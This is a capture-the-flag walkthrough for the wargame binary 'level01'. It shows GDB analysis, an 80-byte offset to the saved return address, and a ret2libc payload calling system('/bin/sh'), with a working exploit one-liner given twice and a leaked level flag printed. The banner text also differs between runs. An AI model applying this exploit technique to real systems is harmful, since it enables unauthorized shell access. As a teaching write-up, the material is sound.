# Level01 — Walkthrough

## Overview

The `level01` binary asks for a username and a password. By analyzing the binary in GDB, we discover that the password check is broken (always fails regardless of input), but the password input buffer is vulnerable to a **buffer overflow**. We exploit this to redirect execution to `system("/bin/sh")` using a **ret2libc** attack.

---

## Step 1: Run the binary and observe its behavior

```
level01@OverRide:~$ ./level01
********* MUSIC MUSIC MUSIC *********
dat_wil
Verifying username....
Enter Password:
admin
nope, incorrect password...
```

The program asks for a username, then a password, and rejects us.

---

## Step 2: Analyze the binary protections

```
level01@OverRide:~$ checksec --file level01
level01@OverRide:~$ readelf -l ./level01 | grep GNU_STACK
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
```

```

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   level01
level01@OverRide:~$ 
```


| Protection | Status | Impact |
|-----------|--------|--------|
| **Canary** | Disabled | No stack overflow detection |
| **NX** | Disabled (RWE) | Stack is executable — shellcode possible, but ret2libc is simpler |
| **PIE** | Disabled | Fixed addresses |
| **RELRO** | Partial | GOT is writable (not needed for this exploit) |

---

## Step 3: Disassemble `verify_user_name`

```
(gdb) disas verify_user_name
(gdb) x/s 0x80486a8
0x80486a8: "dat_wil"
```

The function compares the first 7 bytes of the global buffer `a_user_name` against `"dat_wil"` using `repz cmpsb`. The expected username is **`dat_wil`**.

---

## Step 4: Disassemble `verify_user_pass`

```
(gdb) disas verify_user_pass
(gdb) x/s 0x80486b0
0x80486b0: "admin"
```

The function compares the first 5 bytes of the password buffer against `"admin"`. The expected password is **`admin`**.

---

## Step 5: Discover the broken password check

Looking at the password check logic in `main`:

```asm
0x08048580 <+176>:   call   0x80484a3 <verify_user_pass>
0x08048585 <+181>:   mov    %eax,0x5c(%esp)       ; store result
0x08048589 <+185>:   cmpl   $0x0,0x5c(%esp)       ; if result == 0...
0x0804858e <+190>:   je     0x8048597 <main+199>  ; ...jump to FAILURE
0x08048590 <+192>:   cmpl   $0x0,0x5c(%esp)       ; if result == 0 (again)...
0x08048595 <+197>:   je     0x80485aa <main+218>  ; ...jump to SUCCESS
```

Both branches lead to the failure message:
- If `verify_user_pass` returns **0** (password matches) → first `je` is taken → failure message
- If it returns **non-zero** (password wrong) → first `je` not taken, second `je` also not taken → failure message

**The password check always fails regardless of input.** The correct password `admin` doesn't help. We need a different approach.

---

## Step 6: Identify the buffer overflow

```asm
0x08048565 <+149>:   movl   $0x64,0x4(%esp)       ; size = 100 bytes
0x0804856d <+157>:   lea    0x1c(%esp),%eax        ; buffer at esp+0x1c
0x08048574 <+164>:   call   0x8048370 <fgets@plt>  ; fgets(buffer, 100, stdin)
```

The password buffer starts at `esp + 0x1c` inside a stack frame of `0x60` (96 bytes). `fgets` reads up to **100 bytes**, which overflows past the buffer and overwrites the saved return address (EIP).

### Calculating the offset to EIP

**Static estimate** from the disassembly:

```
Buffer at:     esp + 0x1c  (= ebp - 0x44, if no alignment gap)
Saved EBP at:  ebp + 0x00
Saved EIP at:  ebp + 0x04

Offset = 0x44 + 4 = 0x48 = 72 bytes (without alignment)
```

However, `main` uses `and $0xfffffff0, %esp` which rounds ESP **down** to a
16-byte boundary. This creates a variable gap between EBP and the top of the
`sub $0x60` frame, so the static estimate is unreliable.

**Dynamic measurement in GDB** — breakpoint at the `fgets` call (password read):

```
(gdb) b *0x08048574                          ← break right before fgets (password)
Breakpoint 1 at 0x8048574
(gdb) run
********* ADMIN LOGIN PROMPT *********
Enter Username: dat_wil
verifying username....
Enter Password:
                                              ← hits breakpoint before reading input

Breakpoint 1, 0x08048574 in main ()

(gdb) x/wx $esp                              ← first word on stack = fgets arg0 (buffer ptr)
0xffffd6b0:  0xffffd6cc                       ← buffer address = 0xffffd6cc

(gdb) info frame
Stack level 0, frame at 0xffffd720:
 eip = 0x8048574 in main; saved eip 0xf7e45513
 Saved registers:
  ebx at 0xffffd710, ebp at 0xffffd718,
  edi at 0xffffd714, eip at 0xffffd71c       ← saved EIP is at 0xffffd71c

(gdb) p/d 0xffffd71c - 0xffffd6cc            ← saved_EIP_addr − buffer_addr
$1 = 80                                      ← offset confirmed: 80 bytes
```

Key point: the buffer address must be read **at the time of `fgets`**, not at
`ret`. The epilogue (`lea -0x8(%ebp), %esp` + pops) changes ESP, so measuring
at `ret` gives a wrong result.

### Stack layout at the time of fgets (addresses grow upward)

```
                 low addresses                                          high addresses
                       │                                                      │
                       ▼                                                      ▼
  ┌────────────────────┬───────────┬──────────────┬───────┬───────┬───────────┬───────────┐
  │    pass[0..63]     │   r (int) │  align / pad │  ebx  │  edi  │ saved EBP │ saved EIP │
  │     64 bytes       │  4 bytes  │   variable   │   4   │   4   │     4     │     4     │
  └────────────────────┴───────────┴──────────────┴───────┴───────┴───────────┴───────────┘
  ▲                                                                           ▲
  │                                                                           │
  esp+0x1c (at fgets)                                                    ebp+0x04
  │◄──────────────────────── 80 bytes (measured) ────────────────────────────►│
```

- **pass[64]**: the password buffer where `fgets` writes.
- **r (4)**: local variable at `esp+0x5c`, stores `verify_user_pass` return value.
- **align / pad**: extra bytes from `and $0xfffffff0, %esp` (0 to 12 bytes depending on initial stack alignment at runtime).
- **ebx, edi**: callee-saved registers pushed in the prologue (`push %edi` / `push %ebx`).
- **saved EBP**: old frame pointer pushed by `push %ebp`.
- **saved EIP**: return address — **this is what we overwrite** at offset 80.

The total 80 bytes = 64 (buffer) + 4 (r) + variable alignment + 4 (ebx) + 4 (edi) + 4 (saved EBP) = **80 on this VM** (confirmed by cyclic pattern).

---

## Step 7: Find libc addresses in GDB

```
(gdb) b main
(gdb) run
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e6aed0 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7e5eb70 <exit>
(gdb) find &system,+9999999,"/bin/sh"
0xf7f897ec
```

| Component | Address | Little-endian bytes |
|-----------|---------|---------------------|
| `system()` | `0xf7e6aed0` | `\xd0\xae\xe6\xf7` |
| `exit()` | `0xf7e5eb70` | `\x70\xeb\xe5\xf7` |
| `"/bin/sh"` | `0xf7f897ec` | `\xec\x97\xf8\xf7` |

---

## Step 8: Build the ret2libc payload

What we send as the password (92 bytes total):

```
  byte 0                                    79  80       83  84       87  88       91
  ┌──────────────────────────────────────────┬───────────┬───────────┬──────────────┐
  │            'A' × 80  (padding)           │ system()  │  exit()   │  "/bin/sh"   │
  │                                          │ 4 bytes   │ 4 bytes   │  4 bytes     │
  └──────────────────────────────────────────┴───────────┴───────────┴──────────────┘
                                              ▲           ▲            ▲
                                         overwrites   return addr   1st argument
                                         saved EIP    for system()  of system()
```

When `main` executes `ret`, it pops the 4 bytes at the saved EIP position and
jumps to `system()`. In the x86 **cdecl** calling convention, the next word on
the stack is the return address for the callee (`exit()`), and the word after
that is the first argument (`"/bin/sh"`).

---

## Step 9: Execute the exploit

```bash
(python -c 'print "dat_wil"; print "A"*80 + "\xd0\xae\xe6\xf7" + "\x70\xeb\xe5\xf7" + "\xec\x97\xf8\xf7"'; cat) | ./level01
```

Breaking this down:
- `print "dat_wil"` → correct username (passes `verify_user_name`)
- `print "A"*80` → 80 bytes of padding to reach EIP
- `"\xd0\xae\xe6\xf7"` → overwrites EIP with `system()`
- `"\x70\xeb\xe5\xf7"` → fake return address → `exit()`
- `"\xec\x97\xf8\xf7"` → argument to `system()` → `"/bin/sh"`
- `cat` → keeps stdin open for the shell

---

## Step 10: Get the flag

```
$ cat /home/users/level02/.pass
PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv
```

---

## Final exploit command

```bash
(python -c 'print "dat_wil"; print "A"*80 + "\xd0\xae\xe6\xf7" + "\x70\xeb\xe5\xf7" + "\xec\x97\xf8\xf7"'; cat) | ./level01
```

---

## Key concepts

| Concept | Role in the exploit |
|---|---|
| **Broken logic** | The password check always fails due to a compiler artifact — both branches lead to the failure path |
| **Buffer overflow** | `fgets` reads 100 bytes into a 64-byte stack buffer, overflowing past saved EBP/EIP |
| **Stack alignment** | `and $0xfffffff0, %esp` adds variable padding; the real offset (80) differs from the static calculation (72) |
| **ret2libc** | Overwrites EIP with `system()`, places `"/bin/sh"` as argument — no shellcode needed |
| **x86 calling convention** | After `ret`, the stack must contain: target address, return address, first argument |
| **Little-endian** | Addresses are written LSB-first: `0xf7e6aed0` → `\xd0\xae\xe6\xf7` |
| **GDB** | Used to find `system`, `exit`, and `"/bin/sh"` addresses in libc at runtime |
